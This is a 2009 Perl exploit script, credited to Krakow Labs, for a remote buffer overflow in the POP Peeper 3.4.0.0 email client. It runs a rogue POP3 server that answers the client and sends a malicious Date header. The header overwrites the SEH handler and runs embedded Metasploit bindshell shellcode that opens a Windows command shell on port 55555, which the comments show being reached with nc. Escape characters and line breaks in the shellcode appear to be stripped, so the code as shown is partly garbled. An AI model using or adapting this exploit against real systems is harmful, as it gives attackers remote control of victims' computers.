KL0309EXP-poppeeper_date-bof.txt
Posted on 12 March 2009
#!/usr/bin/perl # KL0309EXP-poppeeper_date-bof.pl # 03.12.2009 # Krakow Labs Development [www.krakowlabs.com] # POP Peeper 3.4.0.0 Date Remote Buffer Overflow Exploit # # SEH overwrite exploitation, uses Imap.dll (included with POP Peeper) for universal # exploitation (more love for no /SafeSEH). Tested on Windows XP SP3. # # rush@KL (Jeremy Brown) [rush@krakowlabs.com] # # rush@linux:~$ sudo perl KL0309EXP-poppeeper_date-bof.pl # xx.xx.xx.xx # rush@linux:~$ nc xx.xx.xx.xx 55555 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:Program FilesPOP Peeper>exit # exit # rush@linux:~$ # # Associated Files & Information: # http://www.krakowlabs.com/res/adv/KL0309ADV-poppeeper_date-bof.txt # http://www.krakowlabs.com/dev/exp/KL0309EXP-poppeeper_date-bof.pl.txt # http://www.krakowlabs.com/dev/exp/KL0309EXP-poppeeper_date-bof.jpeg # # KL0309EXP-poppeeper_date-bof.pl use IO::Socket; $nextsehh = 0x909006EB; # JMP 6 $sehh = 0x10014E39; # Windows XP UNIVERSAL Imap.dll pop pop ret # Win32 Bindshell Shellcode (author=metasploit,port=55555,encoder=pexalphanum,size=709,exitfunc=thread) $sc = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" . "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" . "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" . "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" . "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx46x4bx4e" . "x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx38" . "x4ex46x46x32x46x42x4bx48x45x34x4ex53x4bx58x4ex47" . "x45x30x4ax37x41x30x4fx4ex4bx38x4fx44x4ax31x4bx38" . "x4fx35x42x42x41x50x4bx4ex49x54x4bx48x46x33x4bx38" . "x41x50x50x4ex41x43x42x4cx49x39x4ex4ax46x58x42x4c" . "x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e" . "x46x4fx4bx53x46x35x46x32x4ax42x45x57x45x4ex4bx48" . "x4fx35x46x42x41x50x4bx4ex48x36x4bx48x4ex30x4bx54" . "x4bx58x4fx35x4ex51x41x50x4bx4ex43x50x4ex52x4bx58" . "x49x38x4ex56x46x52x4ex51x41x36x43x4cx41x43x4bx4d" . "x46x36x4bx58x43x54x42x53x4bx48x42x44x4ex30x4bx58" . "x42x57x4ex31x4dx4ax4bx38x42x54x4ax50x50x55x4ax46" . "x50x58x50x44x50x50x4ex4ex42x55x4fx4fx48x4dx48x56" . "x43x35x48x36x4ax46x43x43x44x53x4ax46x47x47x43x37" . "x44x43x4fx55x46x55x4fx4fx42x4dx4ax56x4bx4cx4dx4e" . "x4ex4fx4bx53x42x55x4fx4fx48x4dx4fx35x49x58x45x4e" . "x48x36x41x58x4dx4ex4ax50x44x30x45x45x4cx46x44x30" . "x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55" . "x4fx4fx48x4dx43x55x43x45x43x55x43x35x43x35x43x34" . "x43x55x43x44x43x45x4fx4fx42x4dx48x46x4ax46x49x4d" . "x43x30x48x36x43x55x49x38x41x4ex45x49x4ax46x46x4a" . "x4cx31x42x47x47x4cx47x55x4fx4fx48x4dx4cx36x42x41" . "x41x35x45x45x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42" . "x49x4ex47x45x4fx4fx48x4dx43x55x45x45x4fx4fx42x4d" . "x4ax36x45x4ex49x54x48x48x49x54x47x35x4fx4fx48x4d" . "x42x55x46x45x46x55x45x45x4fx4fx42x4dx43x59x4ax46" . "x47x4ex49x57x48x4cx49x37x47x55x4fx4fx48x4dx45x55" . "x4fx4fx42x4dx48x36x4cx46x46x46x48x56x4ax46x43x36" . "x4dx36x49x48x45x4ex4cx36x42x55x49x45x49x32x4ex4c" . "x49x48x47x4ex4cx36x46x54x49x38x44x4ex41x43x42x4c" . "x43x4fx4cx4ax50x4fx44x34x4dx32x50x4fx44x54x4ex32" . "x43x39x4dx48x4cx37x4ax43x4bx4ax4bx4ax4bx4ax4ax36" . "x44x47x50x4fx43x4bx48x51x4fx4fx45x57x46x34x4fx4f" . "x48x4dx4bx45x47x45x44x55x41x35x41x55x41x35x4cx36" . "x41x50x41x55x41x35x45x45x41x45x4fx4fx42x4dx4ax56" . "x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx36" . "x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx48x47x35x4ex4f" . "x43x58x46x4cx46x36x4fx4fx48x4dx44x45x4fx4fx42x4d" . "x4ax36x4fx4ex50x4cx42x4ex42x56x43x55x4fx4fx48x4d" . "x4fx4fx42x4dx5a"; $serv = IO::Socket::INET->new(Proto=>'tcp', LocalPort=>'110', Listen=>1, Timeout=>60) or die "Error: listen(110) "; $cli = $serv->accept() or die "Error: accept() "; print $cli->peerhost . " "; $nextseh = pack('l', $nextsehh); $seh = pack('l', $sehh); $nop = "x90"; $payload = "Date: " . "A" x 132 . $nextseh . $seh . "x90" x 32 . $sc . " . "; $cli->send("+OK "); $cli->recv($recvbuf, 512); $cli->send("+OK "); $cli->recv($recvbuf, 512); $cli->send("+OK "); $cli->recv($recvbuf, 512); $cli->send("+OK 1 100 "); $cli->recv($recvbuf, 512); $cli->send("+OK 1 w00t . "); $cli->recv($recvbuf, 512); $cli->send("+OK 1 100 . "); $cli->recv($recvbuf, 512); $cli->send("+OK 100 octets "); $cli->send($payload); close($cli); close($serv);
